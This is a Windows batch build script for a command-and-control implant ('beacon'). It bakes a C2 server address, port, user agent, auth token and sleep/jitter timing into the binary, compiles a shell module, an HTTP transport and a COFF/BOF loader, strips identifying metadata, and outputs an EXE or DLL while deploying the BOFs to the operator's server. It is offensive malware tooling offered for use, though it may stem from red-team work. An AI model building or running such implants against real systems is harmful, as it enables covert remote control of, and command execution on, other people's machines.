@echo off
setlocal enabledelayedexpansion
echo ========================================
echo MinGW BOF Build Script
echo ========================================

:: ---------------------------------------------------------------------------
:: Arguments (all positional, all optional — defaults match config.h fallbacks)
::
::   %1  C2_SERVER_IP          e.g. 10.0.0.1          (default: 127.0.0.1)
::   %2  C2_SERVER_PORT        e.g. 443                (default: 8080)
::   %3  C2_USER_AGENT         e.g. "Mozilla/5.0"      (default: Mozilla/5.0)
::   %4  C2_AUTH_TOKEN         e.g. mysecrettoken      (default: empty)
::   %5  C2_SLEEP_BASE_MS      e.g. 10000              (default: 5000)
::   %6  C2_SLEEP_JITTER_MS    e.g. 5000               (default: 3000)
::   %7  C2_USE_HTTPS          1 or 0                  (default: 0)
::   %8  output filename       e.g. implant.exe        (default: beacon.exe or beacon.dll)
::   %9  build mode            exe or dll              (default: exe)
::
:: Generated by `generate` in the C2 console, or call directly:
::   build.bat 10.0.0.1 443 "Mozilla/5.0" mytoken 10000 5000 0 beacon.exe exe
::   build.bat 10.0.0.1 443 "Mozilla/5.0" mytoken 10000 5000 0 beacon.dll dll
:: ---------------------------------------------------------------------------

set "ARG_IP=%~1"
set "ARG_PORT=%~2"
set "ARG_UA=%~3"
set "ARG_TOKEN=%~4"
set "ARG_SLEEP=%~5"
set "ARG_JITTER=%~6"
set "ARG_HTTPS=%~7"
set "ARG_OUT=%~8"
set "ARG_MODE=%~9"

if "%ARG_IP%"==""      set "ARG_IP=127.0.0.1"
if "%ARG_PORT%"==""    set "ARG_PORT=8080"
if "%ARG_UA%"==""      set "ARG_UA=Mozilla/5.0"
if "%ARG_TOKEN%"==""   set "ARG_TOKEN="
if "%ARG_SLEEP%"==""   set "ARG_SLEEP=5000"
if "%ARG_JITTER%"==""  set "ARG_JITTER=3000"
if "%ARG_HTTPS%"==""   set "ARG_HTTPS=0"
if "%ARG_MODE%"==""    set "ARG_MODE=exe"

:: Validate mode
if /i not "%ARG_MODE%"=="exe" if /i not "%ARG_MODE%"=="dll" (
    echo [!] Invalid mode "%ARG_MODE%" — must be "exe" or "dll"
    exit /b 1
)

:: Default output filename depends on mode
if "%ARG_OUT%"=="" (
    if /i "%ARG_MODE%"=="dll" (
        set "ARG_OUT=beacon.dll"
    ) else (
        set "ARG_OUT=beacon.exe"
    )
)

echo [*] Config:
echo     IP:      %ARG_IP%
echo     Port:    %ARG_PORT%
echo     UA:      %ARG_UA%
echo     Token:   %ARG_TOKEN%
echo     Sleep:   %ARG_SLEEP%ms  Jitter: %ARG_JITTER%ms
echo     HTTPS:   %ARG_HTTPS%
echo     Mode:    %ARG_MODE%
echo     Output:  %ARG_OUT%
echo.

:: ---------------------------------------------------------------------------
:: Directories
:: ---------------------------------------------------------------------------
set BUILD_DIR=build
set BOF_BUILD_DIR=build\bofs
set SERVER_BOF_DIR=..\server\bofs

:: Mirror source tree under build\ so .obj files don't collide
set OBJ_CORE=%BUILD_DIR%\core
set OBJ_TRANSPORT=%BUILD_DIR%\transport
set OBJ_CRYPTO=%BUILD_DIR%\crypto
set OBJ_LOADER=%BUILD_DIR%\loader
set OBJ_MODULES=%BUILD_DIR%\modules

if not exist "%BUILD_DIR%"     mkdir "%BUILD_DIR%"
if not exist "%BOF_BUILD_DIR%" mkdir "%BOF_BUILD_DIR%"
if not exist "%OBJ_CORE%"      mkdir "%OBJ_CORE%"
if not exist "%OBJ_TRANSPORT%" mkdir "%OBJ_TRANSPORT%"
if not exist "%OBJ_CRYPTO%"    mkdir "%OBJ_CRYPTO%"
if not exist "%OBJ_LOADER%"    mkdir "%OBJ_LOADER%"
if not exist "%OBJ_MODULES%"   mkdir "%OBJ_MODULES%"

:: ---------------------------------------------------------------------------
:: Common compile flags — config injected via -D, no header-gen step needed
:: ---------------------------------------------------------------------------
set COMMON_FLAGS=-c -O2 -ffunction-sections -fdata-sections -fno-ident ^
  -fno-asynchronous-unwind-tables ^
  -I include -I src -DBOF ^
  "-DC2_SERVER_IP=\"%ARG_IP%\"" ^
  -DC2_SERVER_PORT=%ARG_PORT% ^
  "-DC2_USER_AGENT=\"%ARG_UA%\"" ^
  "-DC2_AUTH_TOKEN=\"%ARG_TOKEN%\"" ^
  -DC2_SLEEP_BASE_MS=%ARG_SLEEP% ^
  -DC2_SLEEP_JITTER_MS=%ARG_JITTER% ^
  -DC2_USE_HTTPS=%ARG_HTTPS%

:: Tell the source which entrypoint to compile
if /i "%ARG_MODE%"=="dll" set "COMMON_FLAGS=%COMMON_FLAGS% -DBUILD_DLL"

:: ---------------------------------------------------------------------------
:: 1. Beacon components
:: ---------------------------------------------------------------------------
echo [1/3] Compiling beacon components...

echo   crypto\crypto.c
x86_64-w64-mingw32-gcc %COMMON_FLAGS% src\crypto\crypto.c -o "%OBJ_CRYPTO%\crypto.obj"
if !errorlevel! neq 0 (echo [!] Failed: crypto\crypto.c && exit /b 1)

echo   crypto\ecdh.c
x86_64-w64-mingw32-gcc %COMMON_FLAGS% src\crypto\ecdh.c -o "%OBJ_CRYPTO%\ecdh.obj"
if !errorlevel! neq 0 (echo [!] Failed: crypto\ecdh.c && exit /b 1)

echo   transport\http.c
x86_64-w64-mingw32-gcc %COMMON_FLAGS% src\transport\http.c -o "%OBJ_TRANSPORT%\http.obj"
if !errorlevel! neq 0 (echo [!] Failed: transport\http.c && exit /b 1)

echo   modules\shell.c
x86_64-w64-mingw32-gcc %COMMON_FLAGS% src\modules\shell.c -o "%OBJ_MODULES%\shell.obj"
if !errorlevel! neq 0 (echo [!] Failed: modules\shell.c && exit /b 1)

echo   core\beacon.c
x86_64-w64-mingw32-gcc %COMMON_FLAGS% src\core\beacon.c -o "%OBJ_CORE%\beacon.obj"
if !errorlevel! neq 0 (echo [!] Failed: core\beacon.c && exit /b 1)

echo   loader\beacon_compatibility.c
x86_64-w64-mingw32-gcc %COMMON_FLAGS% src\loader\beacon_compatibility.c -o "%OBJ_LOADER%\beacon_compatibility.obj"
if !errorlevel! neq 0 (echo [!] Failed: loader\beacon_compatibility.c && exit /b 1)

echo   loader\COFFLoader.c
x86_64-w64-mingw32-gcc %COMMON_FLAGS% src\loader\COFFLoader.c -o "%OBJ_LOADER%\COFFLoader.obj"
if !errorlevel! neq 0 (echo [!] Failed: loader\COFFLoader.c && exit /b 1)

echo   core\package.c
x86_64-w64-mingw32-gcc %COMMON_FLAGS% src\core\package.c -o "%OBJ_CORE%\package.obj"
if !errorlevel! neq 0 (echo [!] Failed: core\package.c && exit /b 1)

:: ---------------------------------------------------------------------------
:: 2. BOFs
::    BOFs need both agent headers (beacon_compatibility.h) and the BOF-side
::    include dir (base.h, queue.h).
:: ---------------------------------------------------------------------------
echo [2/3] Compiling BOFs...

set BOF_FLAGS=-c -Os -fno-asynchronous-unwind-tables -fno-stack-protector ^
  -I include -I bofs\include

for %%f in (bofs\*.c) do (
    echo   %%~nf
    x86_64-w64-mingw32-gcc %BOF_FLAGS% %%f -o "%BOF_BUILD_DIR%\%%~nf.obj"
    if !errorlevel! neq 0 (echo [!] Failed: %%f && exit /b 1)
)

:: ---------------------------------------------------------------------------
:: 3. Link
:: ---------------------------------------------------------------------------
echo [3/3] Linking %ARG_OUT% (%ARG_MODE%)...

set LINK_FLAGS=
if /i "%ARG_MODE%"=="dll" set "LINK_FLAGS=-shared"

x86_64-w64-mingw32-gcc %LINK_FLAGS% ^
  "%OBJ_CRYPTO%\crypto.obj" ^
  "%OBJ_CRYPTO%\ecdh.obj" ^
  "%OBJ_TRANSPORT%\http.obj" ^
  "%OBJ_MODULES%\shell.obj" ^
  "%OBJ_CORE%\beacon.obj" ^
  "%OBJ_CORE%\package.obj" ^
  "%OBJ_LOADER%\beacon_compatibility.obj" ^
  "%OBJ_LOADER%\COFFLoader.obj" ^
  -o "%BUILD_DIR%\%ARG_OUT%" ^
  -Wl,-s -Wl,--gc-sections ^
  -lws2_32 -lbcrypt -lwinhttp -liphlpapi -lsecur32 -ladvapi32
if !errorlevel! neq 0 (echo [!] Link failed && exit /b 1)

:: ---------------------------------------------------------------------------
:: Deploy BOFs to server
:: ---------------------------------------------------------------------------
echo Deploying BOFs to server...
if exist "%SERVER_BOF_DIR%" (
    copy /Y "%BOF_BUILD_DIR%\*.obj" "%SERVER_BOF_DIR%\" >nul
) else (
    echo [!] Server BOF dir not found at %SERVER_BOF_DIR%, skipping deploy
)

echo.
echo ========================================
echo Build complete!
echo Beacon: %BUILD_DIR%\%ARG_OUT% (%ARG_MODE%)
echo BOFs:   %BOF_BUILD_DIR%\
echo ========================================